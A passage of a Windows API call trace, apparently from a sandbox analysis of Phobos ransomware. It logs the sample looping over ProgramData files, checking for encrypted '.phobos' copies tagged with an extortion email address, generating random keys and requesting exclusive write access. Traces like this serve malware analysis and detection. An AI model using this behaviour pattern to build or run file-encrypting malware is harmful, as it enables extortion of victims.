(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile39.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.796] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.796] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.796] ResetEvent (hEvent=0x278) returned 1 [0112.797] SetEvent (hEvent=0x27c) returned 1 [0112.797] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.797] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.797] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.797] CloseHandle (hObject=0x314) returned 1 [0112.797] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile40.bmp")) returned 0x20 [0112.797] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile40.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.797] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.797] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.797] ResetEvent (hEvent=0x278) returned 1 [0112.798] SetEvent (hEvent=0x27c) returned 1 [0112.798] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.798] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.798] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.798] CloseHandle (hObject=0x314) returned 1 [0112.798] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile41.bmp")) returned 0x20 [0112.798] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile41.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.798] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.798] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.798] ResetEvent (hEvent=0x278) returned 1 [0112.798] SetEvent (hEvent=0x27c) returned 1 [0112.799] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.799] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.799] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.799] CloseHandle (hObject=0x314) returned 1 [0112.799] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile42.bmp")) returned 0x20 [0112.799] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile42.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.799] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.799] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.799] ResetEvent (hEvent=0x278) returned 1 [0112.799] SetEvent (hEvent=0x27c) returned 1 [0112.800] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.800] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.800] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.800] CloseHandle (hObject=0x314) returned 1 [0112.800] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile43.bmp")) returned 0x20 [0112.800] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile43.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.800] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.800] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.800] ResetEvent (hEvent=0x278) returned 1 [0112.800] SetEvent (hEvent=0x27c) returned 1 [0112.801] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.801] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.801] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.801] CloseHandle (hObject=0x314) returned 1 [0112.801] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile44.bmp")) returned 0x20 [0112.801] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile44.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.801] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.801] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.802] ResetEvent (hEvent=0x278) returned 1 [0112.802] SetEvent (hEvent=0x27c) returned 1 [0112.802] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.802] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0112.802] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.802] CloseHandle (hObject=0x2b4) returned 1 [0112.802] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp")) returned 0x20 [0112.802] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.802] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.802] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0113.205] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0113.205] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.205] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=442) returned 1 [0113.205] CloseHandle (hObject=0x2b4) returned 1 [0113.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\desktop.ini")) returned 0x26 [0113.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.205] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.206] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0113.206] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.206] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=370) returned 1 [0113.206] CloseHandle (hObject=0x2b4) returned 1 [0113.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini")) returned 0x26 [0113.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.206] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.206] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0113.206] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.206] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=1854) returned 1 [0113.206] CloseHandle (hObject=0x2b4) returned 1 [0113.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini")) returned 0x26 [0113.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.207] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.207] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0113.207] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.207] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=1338) returned 1 [0113.207] CloseHandle (hObject=0x2b4) returned 1 [0113.207] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini")) returned 0x26 [0113.207] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.207] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.207] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0113.207] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.207] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=343) returned 1 [0113.207] CloseHandle (hObject=0x2b4) returned 1 [0113.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\desktop.ini")) returned 0x26 [0113.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.208] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.208] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0113.208] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.208] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=216) returned 1 [0113.208] CloseHandle (hObject=0x2b4) returned 1 [0113.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\desktop.ini")) returned 0x26 [0113.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.209] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.209] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0113.209] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.209] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=1958) returned 1 [0113.209] CloseHandle (hObject=0x2b4) returned 1 [0113.209] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini")) returned 0x26 [0113.209] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.209] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.209] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0113.209] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.209] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=1130) returned 1 [0113.209] CloseHandle (hObject=0x2b4) returned 1 [0113.210] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.ini")) returned 0x26 [0113.210] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.210] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.210] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0113.210] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.210] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=520) returned 1 [0113.210] CloseHandle (hObject=0x2b4) returned 1 [0113.210] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\desktop.ini")) returned 0x26 [0113.210] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.210] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.210] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0113.210] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start 